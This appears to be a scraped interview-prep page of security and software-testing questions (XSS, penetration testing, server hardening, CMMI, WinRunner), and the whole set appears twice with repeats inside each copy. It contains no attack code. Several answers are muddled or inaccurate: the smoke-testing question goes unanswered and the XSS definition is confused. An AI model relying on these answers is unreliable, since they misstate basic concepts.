Most frequently Asked Security Testing Interview Questions and Answers for freshers and experienced pdf free download
1. What is security testing and smoke testing?
Security testing is performed for
1. Scanning network
2. Cracking password
3. Reviewing the log
4. Detection of virus
5. Driving war – on 802.11 or wireless LAN testing
2. What type of security testing you performed?
A very common task in security testing is trying to attack the system. This helps in finding out how vulnerable is the system to attacks. Most systems use encryption to store passwords, URL’s etc. trying to get access to the system by using different combinations of passwords, trying to cross site script etc. Another common example of security testing is to find if the system is vulnerable to SQL injection attacks.
3. What is Cross-Site Scripting: (Acronym – XSS)?
Cross-site scripting is an occurrence when a web application gathers malicious data. A hyperlink is represented for the data which contains malicious contents in it. The malicious portion of the link is encoded by attacker to the site in HEX or other encoding form, which gives the user the impact of less suspicious, when clicked on. Once the data is obtained by the application, the output is created by the malicious code and sent to it, in a manner that it appears as a valid content from the web site.
4. What are the most important steps you would recommend for securing a new web server?
The following are the most important steps for securing a new web server:
1. Update/patch the web server software
2. Ensure that the server functionality is minimized and disable the extra modules
3. Always remove the fault scripts / data
4. Increase the verboseness of logging
5. Update the ownership / permissions of the files.
5. Difference between Verification and Validation
Verification - is to determine the right thing, which involves the testing the implementation of right process. Ex: Are we building the product right?
Validation - is to perform the things in right direction, like checking the developed software adheres the requirements of the client. Ex: right product was built
6. What is configuration Management?
Configuration management aims to establish consistency in an enterprise. This is attained by continuously updating processes of the organization, maintaining versioning and handling the entire organization network, hardware and software components efficiently.
In software, Software Configuration management deals with controlling and tracking changes made to the software. This is necessary to allow easy accommodation of changes at any time.
7. What is staged and continuous models in CMMI?
Staged Model:
The staged model has groups of process areas which are divided into 5 levels. This stage is used by the ancestor software development CMM. It is represented to achieve a CMMI Level Rating from a SCAMPI appraisal.
Continuous Model:
The continuous representation, used by the ancestor systems engineering CMM, is defined as the capability levels within each profile.
The differences between these two representations are completely organizational; but the content is equivalent.
8. What is tailoring?
Tailoring a software process means amending it to meet the needs of the project. It involves altering the processes in different environments, it’s an ongoing process. Factors like customer and end user relation ship, goals of business must be kept in mind while tailoring. Degree to which tailoring is required must be identified.
9. What is process area in CMMI?
Process areas in Capabilty Maturity model describe the features of a products development. These process areas help to identify the level of maturity an organization has attained. These mainly include:
Project planning and monitoring
Risk Management
Requirements development
Process and Product quality assurance
Product integration
Requirement management
Product integration
Configuration management
10. What is Maturity level?
Maturity level of a process defines the nature and maturity present in the organization. These levels help to understand and set a benchmark for the organization.
Five levels that are identified are:
Level 1: Adhoc or initial
Level 2: Repeatable
Level 3: Defined
Level4: managed
Level 5: Optimized.
11. What is Software Process?
A software process or software development process is a method or structure expected to be followed for the development of software. There are several tasks and activities that take place in this process. Different processes like waterfall and iterative exists. In these processes; tasks like analysis, coding, testing and maintenance play an important role.
12. What type of security testing you performed?
A very common task in security testing is trying to attack the system. This helps in finding out how vulnerable is the system to attacks. Most systems use encryption to store passwords, URL’s etc. trying to get access to the system by using different combinations of passwords, trying to cross site script etc. Another common example of security testing is to find if the system is vulnerable to SQL injection attacks.
13. What are the different modes of recording in WinRunner?
WinRunner has two types of recording modes:
1. Context Sensitive recording – records the operations that are preformed in an application by identifying the GUI objects.
2. Analog recording – records the inputs from keyboard, mouse clicks, the x and y coordinates that are travelled by the mouse pointer across the screen.
14. What are the different modes of recording in WinRunner?
WinRunner supports the following recording modes:
• Context Sensitive: - This mode is used to capture and record GUI objects and windows.
• Analog: - Analog modes capture and record the keyboard inputs, mouse clicks and movements. It can’t capture GUI windows and objects.
15. What is “Penetration Testing”?
Penetration testing is a type of security testing process to identify security vulnerabilities in an application by evaluating the system or network with various malicious techniques. The main purpose of this testing is to protect the identified vulnerabilities & secure the important data from unknown user who do not have the access to the system like hackers. The penetration testing can be carried out after the cautious consideration, notification, and planning.
There are two types of penetration testing, White box testing & Black box testing. In White box testing is all information is with tester prior start testing like IP Address, Code & Infrastructure diagram & based on available information tester will perform the testing. In Black box testing, tester do not has any information of system under test. This is more accurate testing method as we are simulating the testing with real hackers which they do not having the information of existing system.
16. Types of testing to perform while Security Testing
Let’s discuss what all steps to prepare while preparing and planning for Security testing:
The first step is to understand the business requirement, security goals and objective in terms of security compliance of the organization. The test planning should consider all security factors like Organization might have planned to achieve PCI compliance etc.
Understand and analyze the requirements of the application under test.
Collect all system setup information used for development of Software and Network like Operating Systems, technology, hardware.
Make out the list of Vulnerabilities and Security Risks.
Based on above step prepare Threat profile.
Based on identified Threat, Vulnerabilities and Security Risks prepare test plan to address these issues.
For each identified Threat, Vulnerabilities and Security Risks prepare Traceability Matrix.
All security testing cannot possible to execute manually, so identify the tool to execute the all security test cases faster & more reliable.
Prepare the Security tests case document.
Perform the Security Test cases execution and retest the defect fixes.
Execute the Regression Test cases.
Prepare detailed report of Security Testing which contains Vulnerabilities and Threats contained, detailing risks, and still open issues etc.
More Security Testing Interview Questions : Click Here
More Security Testing Multiple Choice Questions: Click Here
1. What is security testing and smoke testing?
Security testing is performed for
1. Scanning network
2. Cracking password
3. Reviewing the log
4. Detection of virus
5. Driving war – on 802.11 or wireless LAN testing
2. What type of security testing you performed?
A very common task in security testing is trying to attack the system. This helps in finding out how vulnerable is the system to attacks. Most systems use encryption to store passwords, URL’s etc. trying to get access to the system by using different combinations of passwords, trying to cross site script etc. Another common example of security testing is to find if the system is vulnerable to SQL injection attacks.
3. What is Cross-Site Scripting: (Acronym – XSS)?
Cross-site scripting is an occurrence when a web application gathers malicious data. A hyperlink is represented for the data which contains malicious contents in it. The malicious portion of the link is encoded by attacker to the site in HEX or other encoding form, which gives the user the impact of less suspicious, when clicked on. Once the data is obtained by the application, the output is created by the malicious code and sent to it, in a manner that it appears as a valid content from the web site.
4. What are the most important steps you would recommend for securing a new web server?
The following are the most important steps for securing a new web server:
1. Update/patch the web server software
2. Ensure that the server functionality is minimized and disable the extra modules
3. Always remove the fault scripts / data
4. Increase the verboseness of logging
5. Update the ownership / permissions of the files.
5. Difference between Verification and Validation
Verification - is to determine the right thing, which involves the testing the implementation of right process. Ex: Are we building the product right?
Validation - is to perform the things in right direction, like checking the developed software adheres the requirements of the client. Ex: right product was built
6. What is configuration Management?
Configuration management aims to establish consistency in an enterprise. This is attained by continuously updating processes of the organization, maintaining versioning and handling the entire organization network, hardware and software components efficiently.
In software, Software Configuration management deals with controlling and tracking changes made to the software. This is necessary to allow easy accommodation of changes at any time.
7. What is staged and continuous models in CMMI?
Staged Model:
The staged model has groups of process areas which are divided into 5 levels. This stage is used by the ancestor software development CMM. It is represented to achieve a CMMI Level Rating from a SCAMPI appraisal.
Continuous Model:
The continuous representation, used by the ancestor systems engineering CMM, is defined as the capability levels within each profile.
The differences between these two representations are completely organizational; but the content is equivalent.
8. What is tailoring?
Tailoring a software process means amending it to meet the needs of the project. It involves altering the processes in different environments, it’s an ongoing process. Factors like customer and end user relation ship, goals of business must be kept in mind while tailoring. Degree to which tailoring is required must be identified.
9. What is process area in CMMI?
Process areas in Capabilty Maturity model describe the features of a products development. These process areas help to identify the level of maturity an organization has attained. These mainly include:
Project planning and monitoring
Risk Management
Requirements development
Process and Product quality assurance
Product integration
Requirement management
Product integration
Configuration management
10. What is Maturity level?
Maturity level of a process defines the nature and maturity present in the organization. These levels help to understand and set a benchmark for the organization.
Five levels that are identified are:
Level 1: Adhoc or initial
Level 2: Repeatable
Level 3: Defined
Level4: managed
Level 5: Optimized.
11. What is Software Process?
A software process or software development process is a method or structure expected to be followed for the development of software. There are several tasks and activities that take place in this process. Different processes like waterfall and iterative exists. In these processes; tasks like analysis, coding, testing and maintenance play an important role.
12. What type of security testing you performed?
A very common task in security testing is trying to attack the system. This helps in finding out how vulnerable is the system to attacks. Most systems use encryption to store passwords, URL’s etc. trying to get access to the system by using different combinations of passwords, trying to cross site script etc. Another common example of security testing is to find if the system is vulnerable to SQL injection attacks.
13. What are the different modes of recording in WinRunner?
WinRunner has two types of recording modes:
1. Context Sensitive recording – records the operations that are preformed in an application by identifying the GUI objects.
2. Analog recording – records the inputs from keyboard, mouse clicks, the x and y coordinates that are travelled by the mouse pointer across the screen.
14. What are the different modes of recording in WinRunner?
WinRunner supports the following recording modes:
• Context Sensitive: - This mode is used to capture and record GUI objects and windows.
• Analog: - Analog modes capture and record the keyboard inputs, mouse clicks and movements. It can’t capture GUI windows and objects.
15. What is “Penetration Testing”?
Penetration testing is a type of security testing process to identify security vulnerabilities in an application by evaluating the system or network with various malicious techniques. The main purpose of this testing is to protect the identified vulnerabilities & secure the important data from unknown user who do not have the access to the system like hackers. The penetration testing can be carried out after the cautious consideration, notification, and planning.
There are two types of penetration testing, White box testing & Black box testing. In White box testing is all information is with tester prior start testing like IP Address, Code & Infrastructure diagram & based on available information tester will perform the testing. In Black box testing, tester do not has any information of system under test. This is more accurate testing method as we are simulating the testing with real hackers which they do not having the information of existing system.
16. Types of testing to perform while Security Testing
Let’s discuss what all steps to prepare while preparing and planning for Security testing:
The first step is to understand the business requirement, security goals and objective in terms of security compliance of the organization. The test planning should consider all security factors like Organization might have planned to achieve PCI compliance etc.
Understand and analyze the requirements of the application under test.
Collect all system setup information used for development of Software and Network like Operating Systems, technology, hardware.
Make out the list of Vulnerabilities and Security Risks.
Based on above step prepare Threat profile.
Based on identified Threat, Vulnerabilities and Security Risks prepare test plan to address these issues.
For each identified Threat, Vulnerabilities and Security Risks prepare Traceability Matrix.
All security testing cannot possible to execute manually, so identify the tool to execute the all security test cases faster & more reliable.
Prepare the Security tests case document.
Perform the Security Test cases execution and retest the defect fixes.
Execute the Regression Test cases.
Prepare detailed report of Security Testing which contains Vulnerabilities and Threats contained, detailing risks, and still open issues etc.
More Security Testing Interview Questions : Click Here
More Security Testing Multiple Choice Questions: Click Here
No comments:
Post a Comment